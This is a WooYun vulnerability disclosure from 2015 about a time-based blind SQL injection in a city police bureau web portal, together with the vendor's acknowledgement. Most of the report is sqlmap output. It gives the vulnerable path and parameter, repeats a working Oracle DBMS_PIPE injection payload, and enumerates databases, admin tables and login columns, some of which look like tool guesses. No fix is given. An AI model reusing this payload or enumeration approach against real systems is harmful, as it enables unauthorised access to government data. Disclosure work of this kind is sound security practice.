漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0146274
漏洞标题:某市公安局分站SQL注入漏洞一枚
相关厂商:公安部一所
漏洞作者: 隔壁老三
提交时间:2015-10-13 13:29
修复时间:2015-11-30 22:08
公开时间:2015-11-30 22:08
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(公安部一所)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开
简要描述:
SQL注入
详细说明:
防查水表不深入
漏洞证明:
注入点http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=6327FE43C41759B71D4BB9EF6C71F5DC
sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ORACLE
[7 tables]
+----------------------+
| MSmerge_errorlineage |
| adminrights |
| bestellung |
| loginout |
| mymps_news_img |
| parts |
| tbladmin |
+----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ORACLE
Table: TBLADMIN
[17 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| authentication | non-numeric |
| c_commu_topic_id | non-numeric |
| course_name | non-numeric |
| dnum | non-numeric |
| email | non-numeric |
| gab_pergunta | non-numeric |
| index_num | non-numeric |
| indice_id | non-numeric |
| lake_id | non-numeric |
| menu | non-numeric |
| orderno | non-numeric |
| pass | non-numeric |
| reddito | non-numeric |
| source | non-numeric |
| sub_image5 | non-numeric |
| uname | non-numeric |
| user_login | non-numeric |
+------------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ADMINRIGHTS
[21 tables]
+-------------------------+
| CPG_filetypes |
| Login |
| SUPPORT_INCIDENTS |
| Volume |
| activity |
| adminid |
| content |
| klassen |
| memberid |
| notes |
| p0fs |
| partsvendor |
| pass_hash |
| plugin_sid |
| rating_track |
| sailors |
| spip_messages |
| spip_versions_fragments |
| vcd_VcdToPornStudios |
| warehouse |
| zips |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ADMINRIGHTS
Table: LOGIN
[15 columns]
+---------------------------+-------------+
| Column | Type |
+---------------------------+-------------+
| app_id | non-numeric |
| att_codice | non-numeric |
| blogpermissiongroup | non-numeric |
| emri | non-numeric |
| grtov | non-numeric |
| loginrestrictedtonickname | non-numeric |
| magic | non-numeric |
| news_date | non-numeric |
| old | non-numeric |
| origin | non-numeric |
| rank_id | non-numeric |
| tempid | non-numeric |
| tempprovkredit | non-numeric |
| wdatarow | non-numeric |
| xevento | non-numeric |
+---------------------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
修复方案:
你懂的
版权声明:转载请注明来源 隔壁老三@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-10-16 22:06
厂商回复:
感谢提交!!
验证确认所描述的问题,已通知其修复。
最新状态:
暂无